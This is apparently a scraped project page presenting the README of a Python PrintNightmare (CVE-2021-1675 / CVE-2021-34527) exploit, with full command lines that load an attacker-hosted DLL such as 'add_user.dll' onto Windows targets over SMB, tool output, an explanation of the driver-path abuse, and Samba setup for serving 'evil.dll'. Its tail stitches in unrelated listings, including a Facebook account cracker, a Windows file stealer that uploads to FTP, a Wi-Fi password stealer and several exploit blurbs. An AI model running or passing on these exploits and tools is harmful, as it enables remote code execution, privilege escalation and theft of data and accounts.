Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.

Overview

PrintNightmare

Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.

Installtion

$ pip3 install impacket

Usage

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

usage: printnightmare.py [-h] [-debug] [-port [destination port]] [-target-ip ip address] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
                         [-name driver name] [-env driver name] [-path driver path] [-dll driver dll] [-check] [-list] [-delete]
                         target

PrintNightmare (CVE-2021-1675 / CVE-2021-34527)

positional arguments:
  target                [[domain/]username[:password]@]
   
    

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials
                        cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection:
  -port [destination port]
                        Destination port to connect to MS-RPRN named pipe
  -target-ip ip address
                        IP Address of the target machine. If ommited it will use whatever was specified as target. This is useful when target is the
                        NetBIOS name and you cannot resolve it

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

driver:
  -name driver name     Name for driver
  -env driver name      Environment for driver
  -path driver path     Driver path for driver
  -dll driver dll       Path to DLL

modes:
  -check                Check if target is vulnerable
  -list                 List existing printer drivers
  -delete               Deletes printer driver

   

Examples

Exploitation

Remote DLL
$ ./printnightmare.py -dll '\\172.16.19.1\smb\add_user.dll' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
[*] Driver name: 'Microsoft XPS Document Writer v5'
[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL path: '\\\\172.16.19.1\\smb\\add_user.dll'
[*] Copying over DLL
[*] Successfully copied over DLL
[*] Trying to load DLL
[*] Successfully loaded DLL
Local DLL
$ ./printnightmare.py -dll 'C:\Windows\System32\spool\drivers\x64\3\old\1\add_user.dll' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
[*] Driver name: 'Microsoft XPS Document Writer v5'
[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL path: 'C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\add_user.dll'
[*] Loading DLL
[*] Successfully loaded DLL

Notice that the local DLL example doesn't abuse CVE-2021-34527 to copy over the DLL.

Custom name
$ ./printnightmare.py -dll '\\172.16.19.1\smb\add_user.dll' -name 'My Printer Driver' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
[*] Driver name: 'My Printer Driver'
[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL path: '\\\\172.16.19.1\\smb\\add_user.dll'
[*] Copying over DLL
[*] Successfully copied over DLL
[*] Trying to load DLL
[*] Successfully loaded DLL

$ ./printnightmare.py -list 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
Name:               Microsoft XPS Document Writer v4
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_f340cb58fcd23202\MXDW.gpd
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_9bf7e0c26ba91f8b\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               Microsoft Print To PDF
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_80184dcbef6775bc\MPDW-PDC.xml
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_9bf7e0c26ba91f8b\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               My Printer Driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\add_user.dll
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\add_user.dll
Version:            3
----------------------------------------------------------------
Name:               Microsoft Shared Fax Driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\FXSDRV.DLL
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\FXSUI.DLL
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\FXSUI.DLL
Version:            3
----------------------------------------------------------------
Name:               Microsoft enhanced Point and Print compatibility driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv.dll
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\unishare.gpd
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
Version:            3
----------------------------------------------------------------

Check if target is vulnerable

Unpatched Windows 10
$ ./printnightmare.py -check 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Target appears to be vulnerable!
Patched Windows Server 2022
$ ./printnightmare.py -check 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[!] Target does not appear to be vulnerable

List current printer drivers

$ ./printnightmare.py -list 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
Name:               Microsoft XPS Document Writer v4
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_075615bee6f80a8d\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_8bc7809b71930efc\MXDW.gpd
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_c9865835eff4a608\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               Microsoft Print To PDF
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_075615bee6f80a8d\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_6dc3549941ff1a57\MPDW-PDC.xml
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_c9865835eff4a608\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               Microsoft enhanced Point and Print compatibility driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv.dll
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\unishare.gpd
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
Version:            3
----------------------------------------------------------------

Delete printer driver

May require administrative privileges.

$ ./printnightmare.py -delete -name 'Microsoft XPS Document Writer v5' 'administrator:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Deleted printer driver!

Details

PrintNightmare consists of two CVE's, CVE-2021-1675 / CVE-2021-34527.

CVE-2021-1675

A non-administrative user is allowed to add a new printer driver. This vulnerability was fixed by only allowing administrators to add new printer drivers. A patched version of the print spooler will return RPC_E_ACCESS_DENIED (Code: 0x8001011b) if a non-administrator tries to add a new printer driver.

CVE-2021-34527

When adding a new printer driver, the pDataFile parameter in the DRIVER_CONTAINER allows UNC paths. The DLL specified in pDataFile will however not be loaded, but it will get copied over to a local path allowing us to create a new printer driver with the pConfigFile parameter pointing to the local path which will load the DLL. A patched version of the printer spooler will return ERROR_INVALID_PARAMETER (Code: 0x57)

Combining the pieces

Only CVE-2021-1675 is needed if the malicious DLL is already located on the target.

For PrintNightmare, if the DLL is not a local path, then CVE-2021-34527 can be used to fetch the DLL via UNC paths. For that reason, it is necessary to serve the DLL over SMB. If you're not familiar with SMB and UNC, read the following subsection.

When creating a new printer driver, the DLL in the pDataFile parameter will not be loaded for security reasons. However, it will be copied over to C:\Windows\system32\spool\drivers\x64\3\. Then, we could create a new printer driver that uses pConfigFile (which will load the DLL) with the local path. However, the DLL is in use by the first printer driver when creating the second printer driver. Instead, we could overwrite the first printer driver, which will make the printer driver's DLLs get copied over to C:\Windows\system32\spool\drivers\x64\3\old\\, where is incremented for each DLL. Now we can create a third printer driver that will use the local path C:\Windows\system32\spool\drivers\x64\3\old\\, since the DLL is no longer used. Now it's just a matter of guessing which will start incrementing from 1.

Note that the DLL will keep its filename locally, so if you initially run the exploit with foo.dll and it gets saved to C:\Windows\system32\spool\drivers\x64\3\old\1\foo.dll and you then change the contents of foo.dll locally and run the exploit again and it now gets saved to C:\Windows\system32\spool\drivers\x64\3\old\5\foo.dll, then the original foo.dll will be used since it is located in C:\Windows\system32\spool\drivers\x64\3\old\1\foo.dll. Instead, simply change the filename if you change the contents of the DLL.

SMB and UNC

In short, a UNC path is a path to a file or folder on a network rather than a local file, and it contains the server name and path. For instance, the UNC path \\10.0.0.2\files\foo.txt is a file foo.txt that is served from the files share of the server 10.0.0.2. Usually, a share is served over SMB, but WebDAV is also supported. To create an SMB share on Linux, the easiest and most reliable way is to use the Samba package.

To install Samba with apt:

$ sudo apt install samba

Edit the /etc/samba/smb.conf and add the following at the end of the file:

[smb]
    comment = Samba
    path = /tmp/share
    guest ok = yes
    read only = yes
    browsable = yes
    force user = nobody

This will create a new share called smb and serve the files inside /tmp/share. It allows for anonymous access, and the local user nobody will be used to browse the files.

Then start the Samba service by doing:

$ sudo service smbd start

Suppose your Linux machine has the IP 192.168.1.100 and you wish to serve the evil.dll, then the UNC path in this scenario will be \\192.168.1.100\smb\evil.dll.

Authors

Credits

Owner
Oliver Lyak
Security Researcher
Previously known as @ollypwn
Oliver Lyak
This is a Python program that implements a vacuum cleaner as an Artificial Intelligence.

Vacuum-Cleaner Python3 This is a Python3 agent that implements a simulator for a vacuum cleaner and it is introduction to Artificial Intelligence. A s

Abdultawwab Safarji 6 Nov 14, 2022
Binary check tool to identify command injection and format string vulnerabilities in blackbox binaries

Binary check tool to identify command injection and format string vulnerabilities in blackbox binaries. Using xrefs to commonly injected and format string'd files, it will scan binaries faster than F

Christopher Roberts 3 Nov 16, 2021
Script Crack Facebook Premium 🚶‍♂

prem Script Crack Facebook Premium 🚶‍♂ Install Script $ pkg update && pkg update $ termux-setup-storage $ pkg install git $ pkg install python $ pip

Yumasaa 1 Dec 03, 2021
SCodeScanner stands for Source Code scanner where the user can scans the source code for finding the Critical Vulnerabilities.

The SCodeScanner stands for Source Code Scanner, where you can scan your source code files like PHP and get identify the vulnerabilities inside it. The tool can use by Pentester, Developer to quickly

136 Dec 13, 2022
This collection of tools that makes it easy to secure and/or obfuscate messages, files, and data.

Scrambler App This collection of tools that makes it easy to secure and/or obfuscate messages, files, and data. It leverages encryption tools such as

Mystic 2 Aug 31, 2022
Lightweight and beneficial Dependency Injection plugin for apscheduler

Implementation of dependency injection for apscheduler Prerequisites: apscheduler-di solves the problem since apscheduler doesn't support Dependency I

Glib 11 Dec 07, 2022
一个自动挖掘漏洞的框架,日后会发展成强大的信息收集+漏洞挖掘脚本!

介绍 工具介绍 这是一款致力于将各类优秀脚本集合在一起调用、联动,最终可形成超级渗透脚本的工具。目的是扫描到更全的资产信息,发现更多的漏洞利用。但是这是通过牺牲扫描速度来提升扫描广度的。所以不太适合要进行紧急信息收集和漏洞利用的情况。

Thinking rookie 23 Jul 05, 2022
Static Token And Credential Scanner

Static Token And Credential Scanner What is it? STACS is a YARA powered static credential scanner which suports binary file formats, analysis of neste

STACS 81 Dec 27, 2022
Valeria stealer- - (4Feb 2022) program detects wifi saved passwords in your ROM

Valeria_stealer- Requirements : python 3.9.2 and higher (4Feb 2022) program dete

Mikhail Yolkin 3 May 05, 2022
CVE-2021-22986 & F5 BIG-IP RCE

Vuln Impact This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management

Al1ex 85 Dec 02, 2022
An forensics tool to help aid in the investigation of spoofed emails based off the email headers.

A forensic tool to make analysis of email headers easy to aid in the quick discovery of the attacker. Table of Contents About mailMeta Installation Us

Syed Modassir Ali 59 Nov 26, 2022
Fast and customizable vulnerability scanner For JIRA written in Python

Fast and customizable vulnerability scanner For JIRA. 🤔 What is this? Jira-Lens 🔍 is a Python Based vulnerability Scanner for JIRA. Jira is a propri

Mayank Pandey 185 Dec 25, 2022
Spring4Shell - Spring Core RCE - CVE-2022-22965

Spring Core RCE - CVE-2022-22965 After Spring Cloud, on March 29, another heavyweight vulnerability of Spring broke out on the Internet: Spring Core R

Malte Gejr 118 Dec 31, 2022
This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).

CVE-2021-43798 – Grafana Exploit About This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798

Pedro Havay 12 Nov 18, 2022
Scout Suite - an open source multi-cloud security-auditing tool,

Description Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using t

NCC Group Plc 5k Jan 05, 2023
Steal Files on a Windows Machine

File-Stealer Steal Files on a Windows Machine About This Script will steal certain Files on a Windows Machine and sends them to a FTP Server. Preview

Marcel 5 Nov 17, 2022
Brute-Force-Connected

Brute-Force-Connected Guess the password for Connected accounts the use : Create a new file and put usernames and passwords in it Example : joker:1234

4 Jun 05, 2022
log4j burp scanner

log4jscanner log4j burp插件 特点如下: 0x01 基于Cookie字段、XFF头字段、UA头字段发送payload 0x02 基于域名的唯一性,将host带入dnslog中 插件主要识别五种形式: 1.get请求,a=1&b=2&c=3 2.post请求,a=1&b=2&c=

1 Jun 30, 2022
A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration)

MassDNS A high-performance DNS stub resolver MassDNS is a simple high-performance DNS stub resolver targeting those who seek to resolve a massive amou

B. Blechschmidt 2.5k Jan 07, 2023
A Python replicated exploit for Webmin 1.580 /file/show.cgi Remote Code Execution

CVE-2012-2982 John Hammond | September 4th, 2021 Checking searchsploit for Webmin 1.580 I only saw a Metasploit module for the /file/show.cgi Remote C

John Hammond 25 Dec 08, 2022